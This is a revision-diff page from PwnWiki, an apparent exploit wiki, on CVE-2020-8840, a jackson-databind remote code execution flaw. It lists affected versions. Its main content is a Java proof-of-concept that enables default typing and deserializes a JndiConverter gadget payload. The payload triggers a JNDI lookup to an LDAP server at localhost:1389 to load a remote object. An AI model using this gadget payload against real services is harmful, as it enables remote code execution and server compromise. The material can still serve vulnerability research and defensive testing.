Difference between revisions of "CVE-2020-8840 FasterXML jackson-databind 遠程代碼執行漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <translate> jackson-databind 2.0.0 – 2.9.10.2 經驗證fastjson在開啟了autoType功能的情況下,影響最新...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
 
</translate>
 
</translate>
 
<translate>
 
<translate>
 +
<!--T:2-->
 
jackson-databind 2.0.0 – 2.9.10.2
 
jackson-databind 2.0.0 – 2.9.10.2
  
 +
<!--T:3-->
 
經驗證fastjson在開啟了autoType功能的情況下,影響最新的fastjson v1.2.62版本
 
經驗證fastjson在開啟了autoType功能的情況下,影響最新的fastjson v1.2.62版本
 
</translate>
 
</translate>

Latest revision as of 09:00, 17 June 2021

Other languages:
Chinese • ‎español • ‎中文(中国大陆)‎

漏洞影響

jackson-databind 2.0.0 – 2.9.10.2

經驗證fastjson在開啟了autoType功能的情況下,影響最新的fastjson v1.2.62版本

POC

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
   public static void main(String args[]) {
       ObjectMapper mapper = new ObjectMapper();

       mapper.enableDefaultTyping();

       String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/ExportObject\"}]";

       try {
           mapper.readValue(json, Object.class);
       } catch (IOException e) {
           e.printStackTrace();
       }

   }
}
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-8840_FasterXML_jackson-databind_遠程代碼執行漏洞&oldid=5220"